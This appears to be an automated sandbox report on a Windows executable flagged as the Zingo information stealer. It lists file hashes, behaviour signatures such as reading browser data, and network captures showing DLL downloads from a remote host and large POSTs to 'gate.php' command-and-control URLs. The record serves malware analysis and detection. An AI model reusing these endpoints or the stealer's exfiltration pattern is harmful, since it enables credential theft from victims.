Analysis
-
max time kernel
90s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
16-10-2022 15:09
Behavioral task
behavioral1
Sample
9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
Resource
win7-20220812-en
General
-
Target
9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
-
Size
54KB
-
MD5
b5282d498ca119c35cdbae2d0783dbfd
-
SHA1
d2acb7d1c31e3035386194c09a56f7e22de162d6
-
SHA256
9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5
-
SHA512
7ac7758bc08b0f2075a79196ab85df976fa36ed380b0b8f81739005d92a58a91e55ba845337ab08dcf78d05c31735dbb3835549a6c7416e9a523864ab594add3
-
SSDEEP
768:VzoZgTk0MRUQDbDySGol+1R/8LGRaUh1GM78EEcOwPsiX/z+h:JoZgTPsbDySGol+ELC1NAfG/g
Malware Config
Signatures
-
Zingo stealer payload 1 IoCs
resource yara_rule behavioral2/memory/3720-132-0x0000000000370000-0x0000000000384000-memory.dmp family_zingo -
Downloads MZ/PE file
-
Loads dropped DLL 7 IoCs
pid Process 3720 9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe 3720 9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe 3720 9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe 3720 9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe 3720 9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe 3720 9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe 3720 9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 freegeoip.app 13 freegeoip.app -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3720 9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe"C:\Users\Admin\AppData\Local\Temp\9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:3720
Network
-
Remote address:8.8.8.8:53Requestn21krwhz.beget.techIN AResponsen21krwhz.beget.techIN A87.236.19.248
-
GEThttp://n21krwhz.beget.tech/DLL/DotNetZip.dll9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exeRemote address:87.236.19.248:80RequestGET /DLL/DotNetZip.dll HTTP/1.1
Host: n21krwhz.beget.tech
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Oct 2022 15:11:09 GMT
Content-Type: application/x-msdownload
Content-Length: 472064
Connection: keep-alive
Keep-Alive: timeout=30
Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
ETag: "73400-5e9d1da08cdc0"
Accept-Ranges: bytes
-
GEThttp://n21krwhz.beget.tech/DLL/System.Data.SQLite.dll9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exeRemote address:87.236.19.248:80RequestGET /DLL/System.Data.SQLite.dll HTTP/1.1
Host: n21krwhz.beget.tech
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Oct 2022 15:11:10 GMT
Content-Type: application/x-msdownload
Content-Length: 393520
Connection: keep-alive
Keep-Alive: timeout=30
Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
ETag: "60130-5e9d1da08cdc0"
Accept-Ranges: bytes
-
GEThttp://n21krwhz.beget.tech/DLL/Newtonsoft.Json.dll9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exeRemote address:87.236.19.248:80RequestGET /DLL/Newtonsoft.Json.dll HTTP/1.1
Host: n21krwhz.beget.tech
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Oct 2022 15:11:10 GMT
Content-Type: application/x-msdownload
Content-Length: 701992
Connection: keep-alive
Keep-Alive: timeout=30
Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
ETag: "ab628-5e9d1da08cdc0"
Accept-Ranges: bytes
-
GEThttp://n21krwhz.beget.tech/DLL/BouncyCastle.Crypto.dll9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exeRemote address:87.236.19.248:80RequestGET /DLL/BouncyCastle.Crypto.dll HTTP/1.1
Host: n21krwhz.beget.tech
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Oct 2022 15:11:11 GMT
Content-Type: application/x-msdownload
Content-Length: 2609152
Connection: keep-alive
Keep-Alive: timeout=30
Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
ETag: "27d000-5e9d1da08cdc0"
Accept-Ranges: bytes
-
GEThttp://n21krwhz.beget.tech/DLL//x86/SQLite.Interop.dll9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exeRemote address:87.236.19.248:80RequestGET /DLL//x86/SQLite.Interop.dll HTTP/1.1
Host: n21krwhz.beget.tech
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Oct 2022 15:11:13 GMT
Content-Type: application/x-msdownload
Content-Length: 1374512
Connection: keep-alive
Keep-Alive: timeout=30
Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
ETag: "14f930-5e9d1da08cdc0"
Accept-Ranges: bytes
-
GEThttp://n21krwhz.beget.tech/DLL//x64/SQLite.Interop.dll9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exeRemote address:87.236.19.248:80RequestGET /DLL//x64/SQLite.Interop.dll HTTP/1.1
Host: n21krwhz.beget.tech
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Oct 2022 15:11:14 GMT
Content-Type: application/x-msdownload
Content-Length: 1763632
Connection: keep-alive
Keep-Alive: timeout=30
Last-Modified: Thu, 29 Sep 2022 14:39:59 GMT
ETag: "1ae930-5e9d1da08cdc0"
Accept-Ranges: bytes
-
POSThttp://n21krwhz.beget.tech/gate.php9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exeRemote address:87.236.19.248:80RequestPOST /gate.php HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------8daaf88ae3b3765
Host: n21krwhz.beget.tech
Content-Length: 1505678
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Date: Sun, 16 Oct 2022 15:11:23 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/7.4.25
-
Remote address:8.8.8.8:53Requestfreegeoip.appIN AResponsefreegeoip.appIN A188.114.96.0freegeoip.appIN A188.114.97.0
-
Remote address:188.114.96.0:443RequestGET /xml/ HTTP/1.1
Host: freegeoip.app
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sun, 16 Oct 2022 16:11:17 GMT
Location: https://ipbase.com/xml/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PwNJ8V%2BoM1jKjs66Y%2Bj8VrYMlkTQPd67WgKcM6ueaVU12bgus6oJ6Q8U3cY0IfpW8c3O%2FJ7ZiXHgvr9WAZmHsj8c73nm3gL2t4EXcOuT4Jj9lsNQR9u61La%2BqQq5Mq40"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 75b1b9e4bc981e85-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestipbase.comIN AResponseipbase.comIN A75.2.60.5ipbase.comIN A99.83.231.61
-
Remote address:75.2.60.5:443RequestGET /xml/ HTTP/1.1
Host: ipbase.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Cache-Control: public, max-age=0, must-revalidate
Content-Length: 3082
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2022 14:08:50 GMT
Etag: 1649775430-ssl
Server: Netlify
Strict-Transport-Security: max-age=31536000
X-Nf-Request-Id: 01GFGNJTTEB1VFDBZK9ZXBFD43
-
Remote address:8.8.8.8:53Requestf0671130.xsph.ruIN AResponsef0671130.xsph.ruIN A141.8.197.42
-
POSThttp://f0671130.xsph.ru/gate.php9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exeRemote address:141.8.197.42:80RequestPOST /gate.php HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------8daaf88af9e7278
Host: f0671130.xsph.ru
Content-Length: 1505678
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 400 Bad Request
Date: Sun, 16 Oct 2022 15:11:24 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
-
87.236.19.248:80http://n21krwhz.beget.tech/gate.phphttp9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe1.7MB 7.6MB 4016 6289
HTTP Request
GET http://n21krwhz.beget.tech/DLL/DotNetZip.dllHTTP Response
200HTTP Request
GET http://n21krwhz.beget.tech/DLL/System.Data.SQLite.dllHTTP Response
200HTTP Request
GET http://n21krwhz.beget.tech/DLL/Newtonsoft.Json.dllHTTP Response
200HTTP Request
GET http://n21krwhz.beget.tech/DLL/BouncyCastle.Crypto.dllHTTP Response
200HTTP Request
GET http://n21krwhz.beget.tech/DLL//x86/SQLite.Interop.dllHTTP Response
200HTTP Request
GET http://n21krwhz.beget.tech/DLL//x64/SQLite.Interop.dllHTTP Response
200HTTP Request
POST http://n21krwhz.beget.tech/gate.phpHTTP Response
200 -
188.114.96.0:443https://freegeoip.app/xml/tls, http9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe766 B 3.8kB 9 8
HTTP Request
GET https://freegeoip.app/xml/HTTP Response
301 -
75.2.60.5:443https://ipbase.com/xml/tls, http9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe806 B 8.2kB 10 12
HTTP Request
GET https://ipbase.com/xml/HTTP Response
404 -
141.8.197.42:80http://f0671130.xsph.ru/gate.phphttp9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe1.5MB 16.1kB 1085 394
HTTP Request
POST http://f0671130.xsph.ru/gate.phpHTTP Response
400 -
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
8.8.8.8:53n21krwhz.beget.techdns9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe65 B 81 B 1 1
DNS Request
n21krwhz.beget.tech
DNS Response
87.236.19.248
-
59 B 91 B 1 1
DNS Request
freegeoip.app
DNS Response
188.114.96.0188.114.97.0
-
56 B 88 B 1 1
DNS Request
ipbase.com
DNS Response
75.2.60.599.83.231.61
-
8.8.8.8:53f0671130.xsph.rudns9dfef3d3c0b740f2c1604344647af61b3780fba0ba1902df114f4b746fb166b5.exe62 B 78 B 1 1
DNS Request
f0671130.xsph.ru
DNS Response
141.8.197.42
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
461KB
MD5a999d7f3807564cc816c16f862a60bbe
SHA11ee724daaf70c6b0083bf589674b6f6d8427544f
SHA2568e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
SHA5126f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
-
Filesize
461KB
MD5a999d7f3807564cc816c16f862a60bbe
SHA11ee724daaf70c6b0083bf589674b6f6d8427544f
SHA2568e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
SHA5126f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
-
Filesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
Filesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
Filesize
384KB
MD555c797383dbbbfe93c0fe3215b99b8ec
SHA11b089157f3d8ae64c62ea15cdad3d82eafa1df4b
SHA2565fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
SHA512648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
-
Filesize
384KB
MD555c797383dbbbfe93c0fe3215b99b8ec
SHA11b089157f3d8ae64c62ea15cdad3d82eafa1df4b
SHA2565fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
SHA512648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
-
Filesize
1.3MB
MD58be215abf1f36aa3d23555a671e7e3be
SHA1547d59580b7843f90aaca238012a8a0c886330e6
SHA25683f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae
SHA51238cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b